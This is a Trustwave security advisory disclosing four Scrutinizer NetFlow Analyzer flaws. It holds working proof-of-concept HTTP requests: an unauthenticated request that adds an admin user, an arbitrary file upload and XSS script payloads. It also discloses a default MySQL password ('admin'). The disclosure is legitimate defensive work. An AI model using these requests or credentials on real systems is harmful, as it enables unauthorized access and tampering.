Scrutinizer NetFlow / sFlow Analyzer 9.0.1 XSS / Bypass / File Upload

`Trustwave SpiderLabs Security Advisory TWSL2012-014:  
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer  
  
Published: 07/27/12  
Version: 1.0  
  
Vendor: Plixer International (http://www.plixer.com)  
Product: Scrutinizer NetFlow and sFlow Analyzer  
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions  
may be affected as well. Please note that the software can be found in a  
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html  
for the partial list.  
  
Product description:  
Network analysis tool for monitoring the overall network health and reports  
on which hosts, applications, protocols, etc. that are consuming network  
bandwidth.  
  
Credits:  
Mario Ceballos of the Metasploit Project  
Jonathan Claudius of Trustwave Spiderlabs  
  
Finding 1: HTTP Authentication Bypass Vulnerability  
CVE: CVE-2012-2626  
  
The Scrutinizer web console provides a form-based login facility, requiring  
users to authenticate to gain access to further functionality. A tiered  
user access model is also used, where administrative and standard users  
have a different selection of permissible functions. Authentication and  
authorization is controlled by the cookie-based session management system.  
Although this is implemented in a standardized way, the session tokens are  
not required to perform privileged functions, such as adding users.  
  
Example(s):  
  
This request will add a user named "trustwave" with the password of  
"trustwave" to the administrative user group.  
  
#Request  
POST /cgi-bin/admin.cgi HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Content-Length: 70  
  
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1  
  
#Response  
HTTP/1.1 200 OK  
Date: Wed, 25 Apr 2012 17:52:15 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Length: 19  
Content-Type: text/html; charset=utf-8  
  
{"new_user_id":"2"}  
  
  
Finding 2: Arbitrary File Upload Vulnerability  
CVE: CVE-2012-2627  
  
The Scrutinizer web console is prone to unauthenticated arbitrary file upload  
vulnerability. An attacker could exploit this vulnerability to upload files  
to the affected systems file system as well as overwrite the Scrutinizer  
applications SNMP configuration.  
  
Example(s):  
  
This request will upload a test file to the following location:  
  
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'  
  
Note: This affected folder also contains SNMP configuration files which could  
be overwritten if an attacker were to select the right file name.  
  
#Request  
POST /d4d/uploader.php HTTP/1.0  
Host: A.B.C.D  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593  
Content-Length: 210  
  
  
--_Part_949_3365333252_3066945593  
Content-Disposition: form-data;  
name="uploadedfile"; filename="trustwave.txt"  
Content-Type: application/octet-stream  
  
trustwave  
  
--_Part_949_3365333252_3066945593--  
  
#Response  
HTTP/1.1 200 OK  
Date: Wed, 25 Apr 2012 17:39:15 GMT  
Server: Apache  
X-Powered-By: PHP/5.3.3  
Vary: Accept-Encoding  
Content-Length: 41  
Connection: close  
Content-Type: text/html  
  
{"success":1,"file_name":"trustwave.txt"}  
  
#Confirming on File System  
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"  
trustwave  
  
  
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php  
CVE: CVE-2012-3848  
  
The Scrutinizer web console suffers from multiple Cross Site Scripting  
vulnerabilities in the following pages:  
  
1.) /d4d/contextMenu.php  
2.) /d4d/exporters.php  
  
These vulnerabilities include the following:  
  
1.) XSS via arbitrary parameter  
3.) XSS via referrer header  
  
Example(s):  
  
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php  
  
#Request 1  
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
  
#Response 1  
<snip>  
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>  
<snip>  
  
#Request 2  
GET /d4d/exporters.php HTTP/1.1  
Host: A.B.C.D  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)  
Connection: close  
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1  
Content-Length: 2  
  
#Response 2  
<snip>  
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>  
<snip>  
  
Finding 4: Undocumented Default Admin MySQL Users  
CVE: CVE-2012-3951  
  
The Scrutinizer application relies on an underlying Apache, MySQL and PHP  
installation which is installed as part of the scrutinizer installer  
package. The installation of these packages are transparent to the user  
during the Scrutinizer installation.  
  
The installation selects default passwords for internal MySQL Users which  
are not configured by the user which could be easily guessed by an  
attacker. There is currently no way to change these values within the  
Scrutinizer application and changing them manually in the MySQL instance  
has unknown effects on the application due to hardcoded values for some of  
these accounts.  
  
Example(s):  
  
The following MySQL command can be run to see the users and their relative  
passwords:  
  
#Request  
select User,Password from mysql.user;  
  
#Response  
User |Password  
root |  
root |  
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441  
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441  
  
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'  
users is equivalent to 'admin'  
  
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,  
delete, create, drop, and more permissions within the MySQL instance.  
  
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the  
equivalent of every network interface on the system allowing users with the  
proper access rights to interact directly with the MySQL instance.  
  
  
Remediation Steps:  
Customers should update to the latest version of Scrutinizer NetFlow &  
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been  
corrected in version 9.5.0.  
  
Revision History:  
05/02/12 - Vulnerability disclosed  
05/16/12 - Patch released by vendor  
07/11/12 - Vendor publishes announcement  
07/27/12 - Advisory published  
  
References  
1. http://www.plixer.com  
2. http://blog.spiderlabs.com  
  
  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
  
About Trustwave SpiderLabs:  
SpiderLabs(R) is the advanced security team at Trustwave focused on  
application security, incident response, penetration testing, physical  
security and security research. The team has performed over a thousand  
incident investigations, thousands of penetration tests and hundreds of  
application security tests globally. In addition, the SpiderLabs Research  
team provides intelligence through bleeding-edge research and proof of  
concept tool development to enhance Trustwave's products and services.  
https://www.trustwave.com/spiderlabs  
  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.  
  
  
`